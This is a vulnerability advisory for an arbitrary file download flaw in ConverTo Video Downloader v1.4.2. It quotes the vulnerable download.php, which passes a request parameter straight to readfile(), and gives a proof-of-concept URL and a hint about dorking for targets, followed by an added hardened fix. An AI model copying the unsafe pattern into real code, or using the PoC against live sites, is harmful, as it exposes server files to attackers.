====================================================================================================================================
| # Title     : ConverTo Video Downloader & Converter v1.4.2 - Arbitrary File Download Vulnerability                               |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro)                                                                                        |
| # Vendor    : https://codecanyon.net/item/converto-video-downloader-converter/13225966                                           |  
| # Dork      :                                                                                                                    |
====================================================================================================================================

poc :

[+] Dorking in Google or other search engine.

[+] Affected file : download.php

[+] line 5 $file = urldecode($_GET['f']); takes the path from the request, and line 12 readfile ($file); sends that file back with no validation of the path.

<?php 
if(isset($_GET['f'])){
	
$siz = convertToBytes($_GET['sz']);
$file = urldecode($_GET['f']);
$rand = rand(0,5000);
header("Content-Description: File Transfer"); 
header("Content-Type: application/octet-stream"); 
header('Content-Length: ' . $siz);
header("Content-Disposition: attachment; filename=Facebook_video_$rand.mp4"); 
 ob_clean(); flush();
readfile ($file); 

}

[+] http://localhost/[PATH]/download.php?f= Ev!l
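
[+] Fix : a hardened variant of download.php, given here as an added example (not code from the original advisory or from the vendor). It assumes the script only needs to serve files kept in a single directory; DOWNLOAD_DIR and resolve_download() are hypothetical names.

```php
<?php
// Added example: hardened variant of download.php. Assumption (not from the
// advisory): every downloadable file lives in one directory, DOWNLOAD_DIR.
const DOWNLOAD_DIR = __DIR__ . '/downloads';   // hypothetical storage location

// Return the real path of $requested inside $baseDir, or null if it is not there.
function resolve_download(string $requested, string $baseDir): ?string
{
    // Reject empty names, NUL bytes and stream wrappers (php://, http://, ...)
    if ($requested === '' || strpos($requested, "\0") !== false
        || strpos($requested, '://') !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // basename() drops every directory component, including ../ sequences
    $path = realpath($base . DIRECTORY_SEPARATOR . basename($requested));
    if ($path === false || !is_file($path)) {
        return null;
    }
    // realpath() follows symlinks, so confirm the result is still under $base
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

if (isset($_GET['f']) && is_string($_GET['f'])) {
    // PHP has already URL-decoded $_GET; decoding again, as the original does,
    // lets double-encoded input slip past any filter applied upstream.
    $path = resolve_download($_GET['f'], DOWNLOAD_DIR);
    if ($path === null) {
        http_response_code(404);
        exit;
    }
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Length: ' . filesize($path));   // real size, not the user-supplied sz
    header('Content-Disposition: attachment; filename=Facebook_video_' . rand(0, 5000) . '.mp4');
    readfile($path);
    exit;
}
```

If the application does not need to accept file names at all, mapping an opaque ID to a stored path on the server side removes the user-controlled path entirely.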

Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |
=======================================================================================================================================